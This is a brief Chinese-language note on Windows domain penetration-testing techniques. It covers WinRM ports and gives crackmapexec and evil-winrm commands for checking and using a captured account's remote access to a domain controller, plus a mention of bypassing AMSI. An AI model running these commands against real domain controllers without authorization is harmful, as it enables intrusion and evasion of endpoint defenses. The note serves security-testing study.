域渗透:常见技巧

域环境测试中常见操作与技巧的简要记录。

1. WSMan/WinRM

WinRM默认使用5985(HTTP)和5986(HTTPS)

如果域控开了该服务 当我们获得一个账号的时候

1
2
3
4
5
6
# 使用crackmapexec检查权限
crackmapexec winrm <DC_IP> -u svc-account -p password --shares
# 尝试WinRM
evil-winrm -i <DC_IP> -u svc-account -p password

Bypass-4MSI 切换cmd